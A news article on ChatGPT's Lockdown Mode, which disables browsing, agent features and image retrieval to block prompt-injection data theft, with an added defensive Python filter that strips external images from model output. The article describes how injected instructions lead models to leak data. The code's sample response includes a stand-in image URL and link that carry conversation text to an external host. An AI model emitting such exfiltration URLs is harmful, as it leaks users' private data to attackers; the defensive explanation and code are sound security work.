OpenAI has introduced Lockdown Mode to ChatGPT to prevent data theft resulting from prompt injection attacks.
OpenAI has started to implement a new security feature called Lockdown Mode for ChatGPT, aimed at preventing data theft through prompt injection attacks. This setting disables live web browsing, agent mode, deep research, image retrieval, Canvas networking, and file downloads. It is accessible to all logged-in users, including those on Free, Go, Plus, Pro, and self-serve ChatGPT Business plans.
Prompt injection continues to be a significant challenge for all large language models. This type of attack involves embedding harmful instructions within the content processed by the model, such as webpages or uploaded files. If the model executes those instructions, it could unintentionally send sensitive information to an attacker’s server.
Lockdown Mode severs the pathways attackers use to exfiltrate data, but it does not stop injection itself: malicious payloads embedded in cached web pages or uploaded PDFs can still influence the model’s behavior. What the mode guarantees is that no network requests to external servers can be made, because live browsing is restricted and image retrieval is disabled, which also cuts off pixel-based data channels.
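To make the "cut the channel, not the injection" point concrete, here is an added example (not OpenAI's code, and not how Lockdown Mode is implemented) of an output-side egress filter in the same spirit: it removes externally hosted images from a model response so that no retrieval request can carry data out, and reports outbound links whose query strings could do the same if clicked. The sample response, the host names, and the allowlist are all constructed placeholders.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Markdown image: ![alt](url); Markdown link: [text](url) not preceded by "!".
MD_IMAGE = re.compile(r'!\[[^\]]*\]\((\S+?)\)')
MD_LINK = re.compile(r'(?<!!)\[[^\]]*\]\((\S+?)\)')

@dataclass(frozen=True)
class EgressPolicy:
    lockdown: bool = True                      # when True, external images are never fetched
    allowed_hosts: frozenset = field(default_factory=frozenset)  # hosts trusted to serve images

@dataclass
class ScanResult:
    blocked_images: list   # image URLs removed because retrieval would leave the allowlist
    flagged_links: list    # external links carrying a query string (need a user click, so reported)
    sanitized: str         # response text safe to render under the policy

def is_external(url: str, policy: EgressPolicy) -> bool:
    host = urlparse(url).hostname
    return host is not None and host not in policy.allowed_hosts

def sanitize_output(text: str, policy: EgressPolicy) -> ScanResult:
    blocked, flagged = [], []

    def drop_image(m: re.Match) -> str:
        url = m.group(1)
        if policy.lockdown and is_external(url, policy):
            blocked.append(url)
            return "[image removed: external retrieval disabled]"
        return m.group(0)

    # Images are auto-fetched by the renderer, so they are rewritten before anything is shown.
    out = MD_IMAGE.sub(drop_image, text)
    # Links only fire on a click; report the suspicious ones instead of rewriting them.
    for m in MD_LINK.finditer(out):
        url = m.group(1)
        if is_external(url, policy) and urlparse(url).query:
            flagged.append(url)
    return ScanResult(blocked, flagged, out)

# Constructed model response: one allowlisted image, one external image whose URL
# embeds text from the conversation, and one external link with a query string.
SAMPLE_RESPONSE = (
    "Summary of the document.\n"
    "![logo](https://cdn.example/logo.png)\n"
    "![trace](https://untrusted.example/pixel.png?note=SUMMARY-TEXT)\n"
    "See [details](https://untrusted.example/r?id=SUMMARY-TEXT)."
)
LOCKDOWN = EgressPolicy(lockdown=True, allowed_hosts=frozenset({"cdn.example"}))
```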
OpenAI acknowledges that Lockdown Mode significantly mitigates the risk of data loss through prompt injection, but it cannot guarantee complete protection. Risks may still exist through enabled apps, unforeseen combinations of capabilities, or new techniques that may emerge.
However, the implementation of Lockdown Mode comes with considerable trade-offs. When enabled, ChatGPT loses many of its useful features, such as live browsing, which becomes limited to cached content, and the entire agent mode is removed. Deep research is also unavailable, making it clear that, as OpenAI notes, this mode is “not intended for everyone.”
This feature is introduced amid growing concerns around prompt injection attacks on AI agents. Security researchers have demonstrated vulnerabilities in agents from companies like Anthropic, Google, and Microsoft through their GitHub Actions integrations. Although all three offered bug bounties, they did not issue public advisories. The core issue lies in the fundamental challenge that large language models struggle to differentiate between data and instructions.
Lockdown Mode cannot be activated simultaneously with Developer Mode; turning one on disables the other. Additionally, OpenAI has introduced a separate session management tool that allows users to review active ChatGPT sessions and log out of specific devices if they suspect unauthorized access.
The feature is a practical acknowledgment by OpenAI that it has not solved prompt injection; instead it gives users a way to reduce the risk by giving up functionality. For people handling sensitive data in ChatGPT, that trade-off may be justified. For everyone else, the growing ecosystem of connected apps and agents, and the vulnerabilities that come with it, keeps the risk high.